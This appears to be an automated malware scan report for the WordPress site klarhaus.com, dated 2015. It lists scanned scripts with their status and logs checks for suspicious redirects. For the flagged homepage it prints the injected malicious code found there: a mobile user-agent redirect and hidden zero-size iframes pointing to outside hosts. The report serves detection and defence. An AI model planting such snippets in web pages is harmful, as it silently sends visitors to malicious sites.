Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=klarhaus.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.klarhaus.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 07 Mar 2015 07:02:15 GMT Location: http://klarhaus.com/ Server: Apache Content-Type: text/html; charset=UTF-8 P3P: CP='NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE' X-Pingback: http://klarhaus.com/xmlrpc.php X-Powered-By: PHP/5.2.9p2 | clean |
http://klarhaus.com/ | 200 OK Content-Length: 19416 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://go.unilead.net/SH20k"; } Decoded script: <iframe src="http://bemos.ml/?1" width="0" height="0" align="left"></iframe> Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://yadito.ru/?1625 <iframe src="http://yadito.ru/?1625" width="0" height="0" align="left"> | ||
https://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js?ver=1.6.4 | 200 OK Content-Length: 91668 Content-Type: text/javascript | clean |
http://klarhaus.com/wp-content/plugins/jj-nextgen-jquery-carousel/script/jquery.jcarousel.min.js?ver=3.5 | 200 OK Content-Length: 15956 Content-Type: application/javascript | clean |
http://klarhaus.com/wp-content/plugins/jj-nextgen-jquery-carousel/script/jquery.jj_ngg_shuffle.js?ver=3.5 | 200 OK Content-Length: 391 Content-Type: application/javascript | clean |
http://klarhaus.com/wp-content/plugins/jquery-vertical-accordion-menu/js/jquery.hoverIntent.minified.js?ver=3.5 | 200 OK Content-Length: 1606 Content-Type: application/javascript | clean |
http://klarhaus.com/wp-content/plugins/jquery-vertical-accordion-menu/js/jquery.cookie.js?ver=3.5 | 200 OK Content-Length: 4246 Content-Type: application/javascript | clean |
http://klarhaus.com/wp-content/plugins/jquery-vertical-accordion-menu/js/jquery.dcjqaccordion.2.9.js?ver=3.5 | 200 OK Content-Length: 6749 Content-Type: application/javascript | clean |
http://klarhaus.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995 | 200 OK Content-Length: 26590 Content-Type: application/javascript | clean |
http://klarhaus.com/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.06 | 200 OK Content-Length: 1791 Content-Type: application/javascript | clean |
http://klarhaus.com/wp-includes/js/comment-reply.min.js?ver=3.5 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
http://klarhaus.com/wp-content/plugins/thethe-image-slider/style/js/thethe-image-slider.js?ver=3.5 | 200 OK Content-Length: 31873 Content-Type: application/javascript | clean |
http://klarhaus.com/wp-content/plugins/cforms/js/cforms.js | 200 OK Content-Length: 17739 Content-Type: application/javascript | clean |
http://klarhaus.com/wp-content/plugins/dynamic-headers/AC_RunActiveContent.js | 200 OK Content-Length: 8029 Content-Type: application/javascript | clean |
http://klarhaus.com/wp-content/plugins/faqs-manager/jquery/jquery-ui.min.js | 200 OK Content-Length: 206923 Content-Type: application/javascript | clean |
http://clickunderad.com/pop-10290-1.js | 410 Gone Content-Length: 391 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: klarhaus.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Mar 2015 07:02:17 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
P3P: CP='NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE'
Set-Cookie: PHPSESSID=8406718241b648753323a817fe26f95a; path=/
X-Pingback: http://klarhaus.com/xmlrpc.php
X-Powered-By: PHP/5.2.9p2
GET / HTTP/1.1
Host: klarhaus.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Mar 2015 07:02:17 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
P3P: CP='NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE'
Set-Cookie: PHPSESSID=8406718241b648753323a817fe26f95a; path=/
X-Pingback: http://klarhaus.com/xmlrpc.php
X-Powered-By: PHP/5.2.9p2
Second query (visit from search engine):
GET / HTTP/1.1
Host: klarhaus.com
Referer: http://www.google.com/search?q=klarhaus.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: klarhaus.com
Referer: http://www.google.com/search?q=klarhaus.com
Result:
The result is similar to the first query. There are no suspicious redirects found.